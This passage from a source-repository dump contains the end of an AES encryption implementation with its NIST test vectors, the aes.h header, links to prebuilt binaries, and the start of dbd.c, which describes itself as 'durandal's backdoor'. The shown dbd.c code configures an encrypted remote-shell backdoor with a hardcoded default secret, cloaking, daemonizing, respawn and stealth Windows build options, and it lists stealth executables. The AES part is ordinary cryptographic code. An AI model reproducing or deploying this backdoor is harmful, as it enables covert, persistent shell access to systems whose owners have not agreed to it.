*ctx, uint8 *key, int nbits ) 438 | { 439 | int i; 440 | uint32 *RK, *SK; 441 | 442 | if( do_init ) 443 | { 444 | aes_gen_tables(); 445 | 446 | do_init = 0; 447 | } 448 | 449 | switch( nbits ) 450 | { 451 | case 128: ctx->nr = 10; break; 452 | case 192: ctx->nr = 12; break; 453 | case 256: ctx->nr = 14; break; 454 | default : return( 1 ); 455 | } 456 | 457 | RK = ctx->erk; 458 | 459 | for( i = 0; i < (nbits >> 5); i++ ) 460 | { 461 | GET_UINT32( RK[i], key, i * 4 ); 462 | } 463 | 464 | /* setup encryption round keys */ 465 | 466 | switch( nbits ) 467 | { 468 | case 128: 469 | 470 | for( i = 0; i < 10; i++, RK += 4 ) 471 | { 472 | RK[4] = RK[0] ^ RCON[i] ^ 473 | ( FSb[ (uint8) ( RK[3] >> 16 ) ] << 24 ) ^ 474 | ( FSb[ (uint8) ( RK[3] >> 8 ) ] << 16 ) ^ 475 | ( FSb[ (uint8) ( RK[3] ) ] << 8 ) ^ 476 | ( FSb[ (uint8) ( RK[3] >> 24 ) ] ); 477 | 478 | RK[5] = RK[1] ^ RK[4]; 479 | RK[6] = RK[2] ^ RK[5]; 480 | RK[7] = RK[3] ^ RK[6]; 481 | } 482 | break; 483 | 484 | case 192: 485 | 486 | for( i = 0; i < 8; i++, RK += 6 ) 487 | { 488 | RK[6] = RK[0] ^ RCON[i] ^ 489 | ( FSb[ (uint8) ( RK[5] >> 16 ) ] << 24 ) ^ 490 | ( FSb[ (uint8) ( RK[5] >> 8 ) ] << 16 ) ^ 491 | ( FSb[ (uint8) ( RK[5] ) ] << 8 ) ^ 492 | ( FSb[ (uint8) ( RK[5] >> 24 ) ] ); 493 | 494 | RK[7] = RK[1] ^ RK[6]; 495 | RK[8] = RK[2] ^ RK[7]; 496 | RK[9] = RK[3] ^ RK[8]; 497 | RK[10] = RK[4] ^ RK[9]; 498 | RK[11] = RK[5] ^ RK[10]; 499 | } 500 | break; 501 | 502 | case 256: 503 | 504 | for( i = 0; i < 7; i++, RK += 8 ) 505 | { 506 | RK[8] = RK[0] ^ RCON[i] ^ 507 | ( FSb[ (uint8) ( RK[7] >> 16 ) ] << 24 ) ^ 508 | ( FSb[ (uint8) ( RK[7] >> 8 ) ] << 16 ) ^ 509 | ( FSb[ (uint8) ( RK[7] ) ] << 8 ) ^ 510 | ( FSb[ (uint8) ( RK[7] >> 24 ) ] ); 511 | 512 | RK[9] = RK[1] ^ RK[8]; 513 | RK[10] = RK[2] ^ RK[9]; 514 | RK[11] = RK[3] ^ RK[10]; 515 | 516 | RK[12] = RK[4] ^ 517 | ( FSb[ (uint8) ( RK[11] >> 24 ) ] << 24 ) ^ 518 | ( FSb[ (uint8) ( RK[11] >> 16 ) ] << 16 ) ^ 519 | ( FSb[ (uint8) ( RK[11] >> 8 ) ] << 8 ) ^ 520 | ( FSb[ (uint8) ( RK[11] ) ] ); 521 | 522 | RK[13] = RK[5] ^ RK[12]; 523 | RK[14] = RK[6] ^ RK[13]; 524 | RK[15] = RK[7] ^ RK[14]; 525 | } 526 | break; 527 | } 528 | 529 | /* setup decryption round keys */ 530 | 531 | if( KT_init ) 532 | { 533 | for( i = 0; i < 256; i++ ) 534 | { 535 | KT0[i] = RT0[ FSb[i] ]; 536 | KT1[i] = RT1[ FSb[i] ]; 537 | KT2[i] = RT2[ FSb[i] ]; 538 | KT3[i] = RT3[ FSb[i] ]; 539 | } 540 | 541 | KT_init = 0; 542 | } 543 | 544 | SK = ctx->drk; 545 | 546 | *SK++ = *RK++; 547 | *SK++ = *RK++; 548 | *SK++ = *RK++; 549 | *SK++ = *RK++; 550 | 551 | for( i = 1; i < ctx->nr; i++ ) 552 | { 553 | RK -= 8; 554 | 555 | *SK++ = KT0[ (uint8) ( *RK >> 24 ) ] ^ 556 | KT1[ (uint8) ( *RK >> 16 ) ] ^ 557 | KT2[ (uint8) ( *RK >> 8 ) ] ^ 558 | KT3[ (uint8) ( *RK ) ]; RK++; 559 | 560 | *SK++ = KT0[ (uint8) ( *RK >> 24 ) ] ^ 561 | KT1[ (uint8) ( *RK >> 16 ) ] ^ 562 | KT2[ (uint8) ( *RK >> 8 ) ] ^ 563 | KT3[ (uint8) ( *RK ) ]; RK++; 564 | 565 | *SK++ = KT0[ (uint8) ( *RK >> 24 ) ] ^ 566 | KT1[ (uint8) ( *RK >> 16 ) ] ^ 567 | KT2[ (uint8) ( *RK >> 8 ) ] ^ 568 | KT3[ (uint8) ( *RK ) ]; RK++; 569 | 570 | *SK++ = KT0[ (uint8) ( *RK >> 24 ) ] ^ 571 | KT1[ (uint8) ( *RK >> 16 ) ] ^ 572 | KT2[ (uint8) ( *RK >> 8 ) ] ^ 573 | KT3[ (uint8) ( *RK ) ]; RK++; 574 | } 575 | 576 | RK -= 8; 577 | 578 | *SK++ = *RK++; 579 | *SK++ = *RK++; 580 | *SK++ = *RK++; 581 | *SK++ = *RK++; 582 | 583 | return( 0 ); 584 | } 585 | 586 | /* AES 128-bit block encryption routine */ 587 | 588 | void aes_encrypt( aes_context *ctx, uint8 input[16], uint8 output[16] ) 589 | { 590 | uint32 *RK, X0, X1, X2, X3, Y0, Y1, Y2, Y3; 591 | 592 | RK = ctx->erk; 593 | 594 | GET_UINT32( X0, input, 0 ); X0 ^= RK[0]; 595 | GET_UINT32( X1, input, 4 ); X1 ^= RK[1]; 596 | GET_UINT32( X2, input, 8 ); X2 ^= RK[2]; 597 | GET_UINT32( X3, input, 12 ); X3 ^= RK[3]; 598 | 599 | #define AES_FROUND(X0,X1,X2,X3,Y0,Y1,Y2,Y3) \ 600 | { \ 601 | RK += 4; \ 602 | \ 603 | X0 = RK[0] ^ FT0[ (uint8) ( Y0 >> 24 ) ] ^ \ 604 | FT1[ (uint8) ( Y1 >> 16 ) ] ^ \ 605 | FT2[ (uint8) ( Y2 >> 8 ) ] ^ \ 606 | FT3[ (uint8) ( Y3 ) ]; \ 607 | \ 608 | X1 = RK[1] ^ FT0[ (uint8) ( Y1 >> 24 ) ] ^ \ 609 | FT1[ (uint8) ( Y2 >> 16 ) ] ^ \ 610 | FT2[ (uint8) ( Y3 >> 8 ) ] ^ \ 611 | FT3[ (uint8) ( Y0 ) ]; \ 612 | \ 613 | X2 = RK[2] ^ FT0[ (uint8) ( Y2 >> 24 ) ] ^ \ 614 | FT1[ (uint8) ( Y3 >> 16 ) ] ^ \ 615 | FT2[ (uint8) ( Y0 >> 8 ) ] ^ \ 616 | FT3[ (uint8) ( Y1 ) ]; \ 617 | \ 618 | X3 = RK[3] ^ FT0[ (uint8) ( Y3 >> 24 ) ] ^ \ 619 | FT1[ (uint8) ( Y0 >> 16 ) ] ^ \ 620 | FT2[ (uint8) ( Y1 >> 8 ) ] ^ \ 621 | FT3[ (uint8) ( Y2 ) ]; \ 622 | } 623 | 624 | AES_FROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 1 */ 625 | AES_FROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 2 */ 626 | AES_FROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 3 */ 627 | AES_FROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 4 */ 628 | AES_FROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 5 */ 629 | AES_FROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 6 */ 630 | AES_FROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 7 */ 631 | AES_FROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 8 */ 632 | AES_FROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 9 */ 633 | 634 | if( ctx->nr > 10 ) 635 | { 636 | AES_FROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 10 */ 637 | AES_FROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 11 */ 638 | } 639 | 640 | if( ctx->nr > 12 ) 641 | { 642 | AES_FROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 12 */ 643 | AES_FROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 13 */ 644 | } 645 | 646 | /* last round */ 647 | 648 | RK += 4; 649 | 650 | X0 = RK[0] ^ ( FSb[ (uint8) ( Y0 >> 24 ) ] << 24 ) ^ 651 | ( FSb[ (uint8) ( Y1 >> 16 ) ] << 16 ) ^ 652 | ( FSb[ (uint8) ( Y2 >> 8 ) ] << 8 ) ^ 653 | ( FSb[ (uint8) ( Y3 ) ] ); 654 | 655 | X1 = RK[1] ^ ( FSb[ (uint8) ( Y1 >> 24 ) ] << 24 ) ^ 656 | ( FSb[ (uint8) ( Y2 >> 16 ) ] << 16 ) ^ 657 | ( FSb[ (uint8) ( Y3 >> 8 ) ] << 8 ) ^ 658 | ( FSb[ (uint8) ( Y0 ) ] ); 659 | 660 | X2 = RK[2] ^ ( FSb[ (uint8) ( Y2 >> 24 ) ] << 24 ) ^ 661 | ( FSb[ (uint8) ( Y3 >> 16 ) ] << 16 ) ^ 662 | ( FSb[ (uint8) ( Y0 >> 8 ) ] << 8 ) ^ 663 | ( FSb[ (uint8) ( Y1 ) ] ); 664 | 665 | X3 = RK[3] ^ ( FSb[ (uint8) ( Y3 >> 24 ) ] << 24 ) ^ 666 | ( FSb[ (uint8) ( Y0 >> 16 ) ] << 16 ) ^ 667 | ( FSb[ (uint8) ( Y1 >> 8 ) ] << 8 ) ^ 668 | ( FSb[ (uint8) ( Y2 ) ] ); 669 | 670 | PUT_UINT32( X0, output, 0 ); 671 | PUT_UINT32( X1, output, 4 ); 672 | PUT_UINT32( X2, output, 8 ); 673 | PUT_UINT32( X3, output, 12 ); 674 | } 675 | 676 | /* AES 128-bit block decryption routine */ 677 | 678 | void aes_decrypt( aes_context *ctx, uint8 input[16], uint8 output[16] ) 679 | { 680 | uint32 *RK, X0, X1, X2, X3, Y0, Y1, Y2, Y3; 681 | 682 | RK = ctx->drk; 683 | 684 | GET_UINT32( X0, input, 0 ); X0 ^= RK[0]; 685 | GET_UINT32( X1, input, 4 ); X1 ^= RK[1]; 686 | GET_UINT32( X2, input, 8 ); X2 ^= RK[2]; 687 | GET_UINT32( X3, input, 12 ); X3 ^= RK[3]; 688 | 689 | #define AES_RROUND(X0,X1,X2,X3,Y0,Y1,Y2,Y3) \ 690 | { \ 691 | RK += 4; \ 692 | \ 693 | X0 = RK[0] ^ RT0[ (uint8) ( Y0 >> 24 ) ] ^ \ 694 | RT1[ (uint8) ( Y3 >> 16 ) ] ^ \ 695 | RT2[ (uint8) ( Y2 >> 8 ) ] ^ \ 696 | RT3[ (uint8) ( Y1 ) ]; \ 697 | \ 698 | X1 = RK[1] ^ RT0[ (uint8) ( Y1 >> 24 ) ] ^ \ 699 | RT1[ (uint8) ( Y0 >> 16 ) ] ^ \ 700 | RT2[ (uint8) ( Y3 >> 8 ) ] ^ \ 701 | RT3[ (uint8) ( Y2 ) ]; \ 702 | \ 703 | X2 = RK[2] ^ RT0[ (uint8) ( Y2 >> 24 ) ] ^ \ 704 | RT1[ (uint8) ( Y1 >> 16 ) ] ^ \ 705 | RT2[ (uint8) ( Y0 >> 8 ) ] ^ \ 706 | RT3[ (uint8) ( Y3 ) ]; \ 707 | \ 708 | X3 = RK[3] ^ RT0[ (uint8) ( Y3 >> 24 ) ] ^ \ 709 | RT1[ (uint8) ( Y2 >> 16 ) ] ^ \ 710 | RT2[ (uint8) ( Y1 >> 8 ) ] ^ \ 711 | RT3[ (uint8) ( Y0 ) ]; \ 712 | } 713 | 714 | AES_RROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 1 */ 715 | AES_RROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 2 */ 716 | AES_RROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 3 */ 717 | AES_RROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 4 */ 718 | AES_RROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 5 */ 719 | AES_RROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 6 */ 720 | AES_RROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 7 */ 721 | AES_RROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 8 */ 722 | AES_RROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 9 */ 723 | 724 | if( ctx->nr > 10 ) 725 | { 726 | AES_RROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 10 */ 727 | AES_RROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 11 */ 728 | } 729 | 730 | if( ctx->nr > 12 ) 731 | { 732 | AES_RROUND( X0, X1, X2, X3, Y0, Y1, Y2, Y3 ); /* round 12 */ 733 | AES_RROUND( Y0, Y1, Y2, Y3, X0, X1, X2, X3 ); /* round 13 */ 734 | } 735 | 736 | /* last round */ 737 | 738 | RK += 4; 739 | 740 | X0 = RK[0] ^ ( RSb[ (uint8) ( Y0 >> 24 ) ] << 24 ) ^ 741 | ( RSb[ (uint8) ( Y3 >> 16 ) ] << 16 ) ^ 742 | ( RSb[ (uint8) ( Y2 >> 8 ) ] << 8 ) ^ 743 | ( RSb[ (uint8) ( Y1 ) ] ); 744 | 745 | X1 = RK[1] ^ ( RSb[ (uint8) ( Y1 >> 24 ) ] << 24 ) ^ 746 | ( RSb[ (uint8) ( Y0 >> 16 ) ] << 16 ) ^ 747 | ( RSb[ (uint8) ( Y3 >> 8 ) ] << 8 ) ^ 748 | ( RSb[ (uint8) ( Y2 ) ] ); 749 | 750 | X2 = RK[2] ^ ( RSb[ (uint8) ( Y2 >> 24 ) ] << 24 ) ^ 751 | ( RSb[ (uint8) ( Y1 >> 16 ) ] << 16 ) ^ 752 | ( RSb[ (uint8) ( Y0 >> 8 ) ] << 8 ) ^ 753 | ( RSb[ (uint8) ( Y3 ) ] ); 754 | 755 | X3 = RK[3] ^ ( RSb[ (uint8) ( Y3 >> 24 ) ] << 24 ) ^ 756 | ( RSb[ (uint8) ( Y2 >> 16 ) ] << 16 ) ^ 757 | ( RSb[ (uint8) ( Y1 >> 8 ) ] << 8 ) ^ 758 | ( RSb[ (uint8) ( Y0 ) ] ); 759 | 760 | PUT_UINT32( X0, output, 0 ); 761 | PUT_UINT32( X1, output, 4 ); 762 | PUT_UINT32( X2, output, 8 ); 763 | PUT_UINT32( X3, output, 12 ); 764 | } 765 | 766 | #ifdef TEST 767 | 768 | #include 769 | #include 770 | 771 | /* 772 | * Rijndael Monte Carlo Test: ECB mode 773 | * source: NIST - rijndael-vals.zip 774 | */ 775 | 776 | static unsigned char AES_enc_test[3][16] = 777 | { 778 | { 0xA0, 0x43, 0x77, 0xAB, 0xE2, 0x59, 0xB0, 0xD0, 779 | 0xB5, 0xBA, 0x2D, 0x40, 0xA5, 0x01, 0x97, 0x1B }, 780 | { 0x4E, 0x46, 0xF8, 0xC5, 0x09, 0x2B, 0x29, 0xE2, 781 | 0x9A, 0x97, 0x1A, 0x0C, 0xD1, 0xF6, 0x10, 0xFB }, 782 | { 0x1F, 0x67, 0x63, 0xDF, 0x80, 0x7A, 0x7E, 0x70, 783 | 0x96, 0x0D, 0x4C, 0xD3, 0x11, 0x8E, 0x60, 0x1A } 784 | }; 785 | 786 | static unsigned char AES_dec_test[3][16] = 787 | { 788 | { 0xF5, 0xBF, 0x8B, 0x37, 0x13, 0x6F, 0x2E, 0x1F, 789 | 0x6B, 0xEC, 0x6F, 0x57, 0x20, 0x21, 0xE3, 0xBA }, 790 | { 0xF1, 0xA8, 0x1B, 0x68, 0xF6, 0xE5, 0xA6, 0x27, 791 | 0x1A, 0x8C, 0xB2, 0x4E, 0x7D, 0x94, 0x91, 0xEF }, 792 | { 0x4D, 0xE0, 0xC6, 0xDF, 0x7C, 0xB1, 0x69, 0x72, 793 | 0x84, 0x60, 0x4D, 0x60, 0x27, 0x1B, 0xC5, 0x9A } 794 | }; 795 | 796 | int main( void ) 797 | { 798 | int m, n, i, j; 799 | aes_context ctx; 800 | unsigned char buf[16]; 801 | unsigned char key[32]; 802 | 803 | for( m = 0; m < 2; m++ ) 804 | { 805 | printf( "\n Rijndael Monte Carlo Test (ECB mode) - " ); 806 | 807 | if( m == 0 ) printf( "encryption\n\n" ); 808 | if( m == 1 ) printf( "decryption\n\n" ); 809 | 810 | for( n = 0; n < 3; n++ ) 811 | { 812 | printf( " Test %d, key size = %3d bits: ", 813 | n + 1, 128 + n * 64 ); 814 | 815 | fflush( stdout ); 816 | 817 | memset( buf, 0, 16 ); 818 | memset( key, 0, 16 + n * 8 ); 819 | 820 | for( i = 0; i < 400; i++ ) 821 | { 822 | aes_set_key( &ctx, key, 128 + n * 64 ); 823 | 824 | for( j = 0; j < 9999; j++ ) 825 | { 826 | if( m == 0 ) aes_encrypt( &ctx, buf, buf ); 827 | if( m == 1 ) aes_decrypt( &ctx, buf, buf ); 828 | } 829 | 830 | if( n > 0 ) 831 | { 832 | for( j = 0; j < (n << 3); j++ ) 833 | { 834 | key[j] ^= buf[j + 16 - (n << 3)]; 835 | } 836 | } 837 | 838 | if( m == 0 ) aes_encrypt( &ctx, buf, buf ); 839 | if( m == 1 ) aes_decrypt( &ctx, buf, buf ); 840 | 841 | for( j = 0; j < 16; j++ ) 842 | { 843 | key[j + (n << 3)] ^= buf[j]; 844 | } 845 | } 846 | 847 | if( ( m == 0 && memcmp( buf, AES_enc_test[n], 16 ) ) || 848 | ( m == 1 && memcmp( buf, AES_dec_test[n], 16 ) ) ) 849 | { 850 | printf( "failed!\n" ); 851 | return( 1 ); 852 | } 853 | 854 | printf( "passed.\n" ); 855 | } 856 | } 857 | 858 | printf( "\n" ); 859 | 860 | return( 0 ); 861 | } 862 | 863 | #endif 864 | 865 | -------------------------------------------------------------------------------- /aes.h: -------------------------------------------------------------------------------- 1 | #ifndef _AES_H 2 | #define _AES_H 3 | 4 | #ifndef uint8 5 | #define uint8 unsigned char 6 | #endif 7 | 8 | #ifndef uint32 9 | #define uint32 unsigned long int 10 | #endif 11 | 12 | typedef struct 13 | { 14 | uint32 erk[64]; /* encryption round keys */ 15 | uint32 drk[64]; /* decryption round keys */ 16 | int nr; /* number of rounds */ 17 | } 18 | aes_context; 19 | 20 | int aes_set_key( aes_context *ctx, uint8 *key, int nbits ); 21 | void aes_encrypt( aes_context *ctx, uint8 input[16], uint8 output[16] ); 22 | void aes_decrypt( aes_context *ctx, uint8 input[16], uint8 output[16] ); 23 | 24 | #endif /* aes.h */ 25 | -------------------------------------------------------------------------------- /binaries/dbd-aarch64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-aarch64 -------------------------------------------------------------------------------- /binaries/dbd-aarch64-static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-aarch64-static -------------------------------------------------------------------------------- /binaries/dbd-arm7-static-diet: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-arm7-static-diet -------------------------------------------------------------------------------- /binaries/dbd-armv7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-armv7 -------------------------------------------------------------------------------- /binaries/dbd-armv7-static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-armv7-static -------------------------------------------------------------------------------- /binaries/dbd-linux32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-linux32 -------------------------------------------------------------------------------- /binaries/dbd-linux32-static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-linux32-static -------------------------------------------------------------------------------- /binaries/dbd-linux32-static-diet: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-linux32-static-diet -------------------------------------------------------------------------------- /binaries/dbd-mipsbe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-mipsbe -------------------------------------------------------------------------------- /binaries/dbd-ppc64-static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-ppc64-static -------------------------------------------------------------------------------- /binaries/dbd-ppc64-static-diet: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd-ppc64-static-diet -------------------------------------------------------------------------------- /binaries/dbd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbd.exe -------------------------------------------------------------------------------- /binaries/dbdbg-stealth.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbdbg-stealth.exe -------------------------------------------------------------------------------- /binaries/dbdbg.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/binaries/dbdbg.exe -------------------------------------------------------------------------------- /conf/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gitdurandal/dbd/8cf5350781b6753fcdd863148a5dcc6976e693ca/conf/.gitignore -------------------------------------------------------------------------------- /dbd.c: -------------------------------------------------------------------------------- 1 | /* 2 | * dbd - durandal's backdoor - $Revision: 1.50 $ 3 | * Copyright (C) 2013 Kyle Barnthouse 4 | * 5 | * This program is free software; you can redistribute it and/or modify it 6 | * under the terms of the GNU General Public License as published by the Free 7 | * Software Foundation; either version 2 of the License, or (at your option) 8 | * any later version. 9 | * 10 | * This program is distributed in the hope that it will be useful, but WITHOUT 11 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 12 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 13 | * more details. 14 | * 15 | * You should have received a copy of the GNU General Public License along 16 | * with this program; if not, write to the Free Software Foundation, Inc., 59 17 | * Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | * 19 | * See the COPYING file for more information. 20 | * 21 | ****************************************************************************** 22 | * Shamelessly ripped from the now defunct sbd 23 | * Copyright (C) 2004 Michel Blomgren 24 | * 25 | ****************************************************************************** 26 | * 27 | * dbd's AES-CBC-128 + HMAC-SHA1 implementation is Copyright (C) Christophe 28 | * Devine and is distributed under the GNU General Public 29 | * License (GPL). 30 | * 31 | ****************************************************************************** 32 | * 33 | * Some code has been derived from doexec.c from the Win32 port of Netcat (C) 34 | * Weld Pond and *hobbit*. Parts of doexec.c is Copyright (C) 1994 Nathaniel 35 | * W. Mishkin (doexec.c code was originally derived from rlogind.exe). This 36 | * code has been slightly modified for dbd by Michel Blomgren, and is called 37 | * doexec_win32.h. doexec_unix.h is completely (C) Michel Blomgren. 38 | * 39 | * The original version of Netcat was written by *hobbit* 40 | * The NT version was done by Weld Pond 41 | * 42 | */ 43 | 44 | #if defined WIN32 && defined WINMAIN 45 | /* show some warnings during compilation */ 46 | #warning "compiling without console support!" 47 | #warning "usage without -q or -e cmd will result in displaying popup boxes for incoming data ;)" 48 | #endif 49 | 50 | #if defined WIN32 && defined WINMAIN && defined STEALTH 51 | /* nop */ 52 | #else 53 | static unsigned char rcsid[] = 54 | "$Id: dbd.c,v 1.50 2013/05/20 15:40:00 durandal Exp $"; 55 | #endif 56 | 57 | 58 | /* edit dbd.h to hardcode listen/connect behaviour into dbd */ 59 | #include "dbd.h" 60 | 61 | 62 | #ifdef WIN32 63 | #define __USE_WIN32_SOCKETS 64 | 65 | #include 66 | #include 67 | #include 68 | #include 69 | #include 70 | #include 71 | #include 72 | 73 | #else 74 | /* else, assume Unix-like (Linux, *BSD, Solaris, etc.) */ 75 | #include 76 | #include 77 | #include 78 | #include 79 | #include 80 | #include 81 | #include 82 | #include 83 | 84 | #include 85 | #include 86 | #include 87 | 88 | #include 89 | #include 90 | extern int errno; 91 | extern int h_errno; 92 | #endif 93 | 94 | 95 | #if defined WIN32 && defined WINMAIN 96 | #define MAX_NUM_ARGVS 128 97 | int argc; 98 | char *argv[MAX_NUM_ARGVS]; 99 | #endif 100 | 101 | extern char *optarg; 102 | extern int optind, opterr, optopt; 103 | 104 | 105 | 106 | 107 | /******** definitions ********/ 108 | 109 | #ifndef INADDR_NONE 110 | #define INADDR_NONE 0xffffffff 111 | #endif 112 | 113 | /******** global variables ********/ 114 | 115 | #ifdef WIN32 116 | #define AUTO_CMD 1 117 | #endif 118 | 119 | #ifndef HOST 120 | #define HOST NULL 121 | #endif 122 | #ifndef BINDHOST 123 | #define BINDHOST NULL 124 | #endif 125 | #ifndef PORT 126 | #define PORT 0 127 | #endif 128 | #ifndef SOURCE_PORT 129 | #define SOURCE_PORT 0 130 | #endif 131 | #ifndef DOLISTEN 132 | #define DOLISTEN 0 133 | #endif 134 | #ifndef EXECPROG 135 | #define EXECPROG NULL 136 | #endif 137 | #ifndef CONVERT_TO_CRLF 138 | #define CONVERT_TO_CRLF 0 139 | #endif 140 | 141 | #ifndef ENCRYPTION 142 | #define ENCRYPTION 1 143 | #endif 144 | #ifndef SHARED_SECRET 145 | #define SHARED_SECRET "lulzsecpwnsj00" 146 | #endif 147 | 148 | #ifndef RESPAWN_ENABLED 149 | #define RESPAWN_ENABLED 0 150 | #endif 151 | #ifndef RESPAWN_INTERVAL 152 | #define RESPAWN_INTERVAL 0 153 | #endif 154 | 155 | #ifndef QUIET 156 | #define QUIET 0 157 | #endif 158 | #ifndef VERBOSE 159 | #define VERBOSE 0 160 | #endif 161 | #ifndef USE_DNS 162 | #define USE_DNS 1 163 | #endif 164 | #ifndef SNOOPING 165 | #define SNOOPING 0 166 | #endif 167 | #ifndef DAEMONIZE 168 | #define DAEMONIZE 0 169 | #endif 170 | #ifndef CLOAK 171 | #define CLOAK 0 172 | #endif 173 | 174 | #ifndef IMMOBILITY_TIMEOUT 175 | #define IMMOBILITY_TIMEOUT 0 176 | #endif 177 | 178 | #ifndef HIGHLIGHT_INPUT 179 | #define HIGHLIGHT_INCOMING 0 180 | #endif 181 | #ifndef HIGHLIGHT_PREFIX 182 | #define HIGHLIGHT_PREFIX "\x1b[0;32m" 183 | #endif 184 | #ifndef HIGHLIGHT_SUFFIX 185 | #define HIGHLIGHT_SUFFIX "\x1b[0m" 186 | #endif 187 | #ifndef SEPARATOR_BETWEEN_PREFIX_AND_DATA 188 | #define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": " 189 | #endif 190 | 191 | 192 | char *host = HOST; 193 | char *bind_to_address = BINDHOST; 194 | int port = PORT; 195 | int sport = SOURCE_PORT; 196 | int do_listen = DOLISTEN; 197 | char *program_to_execute = EXECPROG; 198 | int convert_to_crlf = CONVERT_TO_CRLF; 199 | int use_encryption = ENCRYPTION; 200 | char *aes_secret = SHARED_SECRET; 201 | 202 | int respawn_enabled = RESPAWN_ENABLED; 203 | int respawn_interval = RESPAWN_INTERVAL; 204 | 205 | int quiet = QUIET; 206 | int verbose = VERBOSE; 207 | int use_dns = USE_DNS; 208 | int snooping = SNOOPING; 209 | int daemonize = DAEMONIZE; 210 | int cloak = CLOAK; 211 | 212 | int highlight_incoming = HIGHLIGHT_INCOMING; 213 | char highlight_prefix[] = HIGHLIGHT_PREFIX; 214 | char highlight_suffix[] = HIGHLIGHT_SUFFIX; 215 | char *prefix_outgoing_with = NULL; 216 | char separator_between_prefix_and_data[] = SEPARATOR_BETWEEN_PREFIX_AND_DATA; 217 | 218 | #ifdef WIN32 219 | #ifndef RUN_ONLY_ONE_INSTANCE 220 | #define RUN_ONLY_ONE_INSTANCE 0 221 | #endif 222 | #ifndef INSTANCE_SEMAPHORE 223 | #define INSTANCE_SEMAPHORE "durandal_bd_semaphore" 224 | #endif 225 | int only_one_instance = RUN_ONLY_ONE_INSTANCE; 226 | char dbd_semaphore[] = INSTANCE_SEMAPHORE; 227 | HANDLE dbd_semhandle; 228 | #endif 229 | 230 | 231 | #ifndef WIN32 232 | int immobility_timeout = IMMOBILITY_TIMEOUT; 233 | int invokeshell = 0; 234 | #endif 235 | 236 | 237 | /******** functions ********/ 238 | 239 | #ifdef WIN32 240 | extern BOOL doexec(SOCKET ClientSocket); 241 | #else 242 | extern int doexec(int sockfd); 243 | #endif 244 | 245 | #include "pel.h" 246 | #include "misc.h" 247 | #include "readwrite.h" 248 | 249 | 250 | #if defined WIN32 && defined WINMAIN 251 | /* Are we running winnt? */ 252 | BOOL IsWinNT() { 253 | OSVERSIONINFO osv; 254 | osv.dwOSVersionInfoSize = sizeof(osv); 255 | GetVersionEx(&osv); 256 | return (osv.dwPlatformId == VER_PLATFORM_WIN32_NT); 257 | } 258 | #endif 259 | 260 | 261 | /* socket_code.h contain dbd_listen() and dbd_connect() */ 262 | #include "socket_code.h" 263 | 264 | 265 | #ifdef WIN32 266 | void dbd_release_semaphore(void) { 267 | ReleaseSemaphore(dbd_semhandle, 1, NULL); 268 | CloseHandle(dbd_semhandle); 269 | } 270 